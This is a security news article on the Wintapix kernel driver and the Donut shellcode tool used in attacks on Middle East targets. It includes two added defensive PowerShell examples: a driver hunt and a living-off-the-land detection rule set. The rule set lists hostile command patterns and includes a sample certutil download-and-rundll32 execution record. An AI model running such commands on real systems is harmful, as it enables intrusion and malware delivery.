Undetected Attacks Against Middle East Targets Conducted Since 2020

Published: 23/11/2024   Category: security




Targeted attacks against Saudi Arabia and other Middle East nations have been detected with a tool that's been in the wild since 2020.



Businesses in the Middle East have faced a series of targeted attacks over the past few years in which threat actors paired an open source shellcode generator with a custom kernel driver.
Researchers at Fortinet came across the so-called Donut tool while monitoring suspicious executables that were built with open source tools. Donut, an open source shellcode-generation tool, and a variant of a kernel driver known as Wintapix were found to have been used together in targeted cyberattacks on Saudi Arabia and other Middle East nations.
Fortinet researchers Geri Revay and Hossein Jazi said in a post on their research that they believe the driver has been active in the wild since at least mid-2020, went unreported until now, and was used in several campaigns over the past few years.
Specifically, Donut produces x86 or x64 shellcode payloads from .NET assemblies, and that shellcode can be injected into an arbitrary Windows process for in-memory execution. In this attack, Wintapix is loaded into the kernel and injects its embedded shellcode into a suitable process running with Local System privileges; the shellcode then loads and executes an encrypted .NET payload.
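As an added example, not from the article or from Fortinet's research: a PowerShell hunt a responder could run on a Windows host to surface kernel drivers worth a closer look. It deliberately encodes no name, hash or path from the campaign above (the article reports none); it flags every registered driver that is unsigned, signed by someone other than Microsoft, or loaded from outside the system driver directory, and reports its SHA-256 so the hash can be checked against whatever telemetry or threat intelligence you hold. The trusted-signer patterns are an assumption for the example and should be adjusted for your own estate.

```powershell
# Added example; not code from the article or from Fortinet.
# Surfaces registered kernel drivers that are unsigned, not signed by Microsoft,
# or loaded from outside %SystemRoot%\System32\drivers, with their SHA-256.
# Run from an elevated PowerShell session on the host being examined.

function Get-SuspiciousKernelDriver {
    [CmdletBinding()]
    param(
        # Assumption: signer subjects containing these substrings are expected.
        # Add third-party vendors (EDR, storage, GPU) you know are legitimate.
        [string[]] $TrustedSignerPattern = @('Microsoft Windows', 'Microsoft Corporation')
    )

    $driverDir = Join-Path $env:SystemRoot 'System32\drivers'

    Get-CimInstance -ClassName Win32_SystemDriver | ForEach-Object {
        $drv = $_
        if (-not $drv.PathName) { return }   # a few boot-start entries report no path

        # PathName comes in several forms: \??\C:\..., \SystemRoot\..., or a path
        # relative to the Windows directory. Normalise it to a real file path.
        $path = $drv.PathName -replace '^\\\?\?\\', ''
        $path = $path -replace '^\\SystemRoot', $env:SystemRoot
        if (-not [System.IO.Path]::IsPathRooted($path)) {
            $path = Join-Path $env:SystemRoot $path
        }
        if (-not (Test-Path -LiteralPath $path)) { return }

        $sig    = Get-AuthenticodeSignature -FilePath $path
        $signer = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '' }
        $hash   = (Get-FileHash -LiteralPath $path -Algorithm SHA256).Hash

        $reasons = @()
        if ($sig.Status -ne 'Valid') {
            $reasons += "signature status: $($sig.Status)"
        }
        elseif (-not ($TrustedSignerPattern | Where-Object { $signer -like "*$_*" })) {
            $reasons += "signer: $signer"
        }
        if ($path -notlike "$driverDir\*") {
            $reasons += "loaded from: $([System.IO.Path]::GetDirectoryName($path))"
        }

        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                Name      = $drv.Name
                State     = $drv.State       # 'Running' sorts before 'Stopped' below
                StartMode = $drv.StartMode
                Path      = $path
                SHA256    = $hash
                Reasons   = ($reasons -join '; ')
            }
        }
    }
}

Get-SuspiciousKernelDriver | Sort-Object State, Name | Format-Table -AutoSize -Wrap
```

Treat the output as leads, not verdicts. Inbox drivers are usually catalog-signed rather than embedded-signed, so a Valid status depends on the local catalog store being intact, and a validly signed third-party driver with a known vulnerability (the bring-your-own-vulnerable-driver pattern) passes the signer check once its vendor is on the trusted list; the SHA-256 column is there so each hit can be checked against your own telemetry and against public vulnerable-driver lists.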
One sample the Fortinet researchers captured was uploaded to VirusTotal in February 2023 but had been compiled in May 2020. Another variant of this driver with the same name was compiled around that time as well but was uploaded to VirusTotal in September 2022.
Fortinet researchers say it's unclear how the driver was distributed, and they don't know who was behind this operation. "Observed telemetry shows that while this driver has primarily targeted Saudi Arabia, it has also been detected in Jordan, Qatar, and the United Arab Emirates, which are the classic targets of Iranian threat actors," the report said.
"Iranian threat actors have been known to exploit Microsoft Exchange servers to deploy additional malware, so it is possible that this driver has been employed alongside Exchange attacks. To that point, the compilation time of the drivers is also aligned with times when Iranian threat actors were exploiting Exchange server vulnerabilities," the researchers wrote.
At this stage, it is unclear which organizations were targeted and what the attackers were looking for. Ciarán Walsh, associate research engineer at Tenable, says that, depending on the nature of the attack and the sophistication of the threat actor, it is entirely possible for a campaign to go undetected for an extended period, as this one did.
APT1 (Comment Crew) has been noted as maintaining a presence on victim networks without detection for years during its cyberespionage campaigns, he says.
Asked whether he believes the time spent undetected is indicative of an attacker's sophistication, Walsh says an attacker's sophistication is based on a myriad of factors and also depends on the objectives of a campaign.
In espionage, the aim would be to go undetected for however long it takes to achieve those objectives, he says, but in campaigns that aim to cause disruption, such as Anonymous Sudan and its DDoS campaigns, being stealthy and maintaining a foothold in a target network is not a priority.
Walsh notes that open source tools are more likely to be detected, as the security community knows of them and countermeasures and remediation techniques have been developed to counteract them.
Custom tooling is much more difficult to detect as automated systems have little, if any, information about the tool to use as part of their detection mechanisms, he says. Attackers do sometimes adopt an approach of using tools already on target systems or within target networks.
That living-off-the-land approach was used by Volt Typhoon, an APT attributed to China that Microsoft last week warned had gained access to telecom networks and other critical infrastructure targets in the US.
Living-off-the-land allows for stealth as there is no execution of any suspicious programs or scripts, which would trigger an alert, Walsh says. The attackers instead use tools built into operating systems, which are less likely to trigger an alert, or even be deemed suspicious.
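As an added example, not from the article, Tenable or Microsoft: the point that built-in tools are "less likely to trigger an alert" holds only while detection keys on which binary ran. Looking at how the binary was invoked is the usual answer. The PowerShell below is a small rule set of that kind, run over constructed process-creation records shaped like the fields of Security event 4688; the rules, the field names and the sample records are all assumptions made for this example, the rule list is deliberately short, and the IP address is from a documentation range.

```powershell
# Added example; not from the article, Tenable or Microsoft.
# Scores process-creation records for living-off-the-land patterns: built-in
# Windows binaries launched with arguments legitimate software rarely passes.
# Field names follow Security event 4688 (NewProcessName, CommandLine, ...);
# the rule list is an assumption for the example and is far from complete.

$LolbinRules = @(
    @{ Image = 'certutil.exe';   Pattern = '-urlcache|-decode|-encode';                            Why = 'certutil used to download or decode' }
    @{ Image = 'rundll32.exe';   Pattern = 'javascript:|\\users\\|\\temp\\|\\programdata\\';        Why = 'rundll32 loading script or a DLL from a user-writable path' }
    @{ Image = 'regsvr32.exe';   Pattern = '/i:https?:|scrobj\.dll';                                Why = 'regsvr32 fetching a remote scriptlet' }
    @{ Image = 'mshta.exe';      Pattern = 'https?:|javascript:|vbscript:';                         Why = 'mshta running remote or inline script' }
    @{ Image = 'powershell.exe'; Pattern = '-enc|frombase64string|downloadstring|-w(indowstyle)? +hidden'; Why = 'encoded, hidden or downloading PowerShell' }
    @{ Image = 'wmic.exe';       Pattern = 'process +call +create|/node:';                          Why = 'wmic used to spawn a process' }
)

function Find-LolbinActivity {
    param(
        [Parameter(Mandatory)] [object[]] $Events,
        [object[]] $Rules = $LolbinRules
    )
    foreach ($ev in $Events) {
        $image = [System.IO.Path]::GetFileName($ev.NewProcessName)
        foreach ($r in $Rules) {
            # -match is case-insensitive by default, which suits command lines.
            if ($image -ieq $r.Image -and $ev.CommandLine -match $r.Pattern) {
                [pscustomobject]@{
                    Time    = $ev.TimeCreated
                    Host    = $ev.Computer
                    Parent  = [System.IO.Path]::GetFileName($ev.ParentProcessName)
                    Image   = $image
                    Reason  = $r.Why
                    Command = $ev.CommandLine
                }
            }
        }
    }
}

# Constructed sample records, not real telemetry. 198.51.100.0/24 is a documentation range.
$SampleEvents = @(
    [pscustomobject]@{ TimeCreated = '2024-11-23T08:01:11Z'; Computer = 'WS01'
        ParentProcessName = 'C:\Windows\System32\cmd.exe'
        NewProcessName    = 'C:\Windows\System32\certutil.exe'
        CommandLine       = 'certutil -urlcache -split -f http://198.51.100.7/a.txt C:\Users\Public\a.txt' }
    [pscustomobject]@{ TimeCreated = '2024-11-23T08:01:15Z'; Computer = 'WS01'
        ParentProcessName = 'C:\Windows\System32\cmd.exe'
        NewProcessName    = 'C:\Windows\System32\rundll32.exe'
        CommandLine       = 'rundll32.exe C:\Users\Public\a.txt,Start' }
    [pscustomobject]@{ TimeCreated = '2024-11-23T08:02:40Z'; Computer = 'WS01'
        ParentProcessName = 'C:\Windows\System32\services.exe'
        NewProcessName    = 'C:\Windows\System32\svchost.exe'
        CommandLine       = 'C:\Windows\System32\svchost.exe -k netsvcs -p' }
    [pscustomobject]@{ TimeCreated = '2024-11-23T08:03:02Z'; Computer = 'WS01'
        ParentProcessName = 'C:\Windows\explorer.exe'
        NewProcessName    = 'C:\Windows\System32\certutil.exe'
        CommandLine       = 'certutil -verify C:\Users\alice\Downloads\cert.cer' }
)

Find-LolbinActivity -Events $SampleEvents | Format-Table Time, Parent, Image, Reason -AutoSize
```

The sample is built so that the first two records (a certutil download followed by rundll32 loading the downloaded file from a user-writable path) are the ones the rules are meant to trip, while the svchost launch and the certutil certificate check are ordinary and carry no flagged arguments. In production the same function would be fed from `Get-WinEvent` on the Security log or from Sysmon event 1, and the parent/child pairing (cmd.exe spawning certutil, then rundll32, within seconds) is worth a correlation rule of its own.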
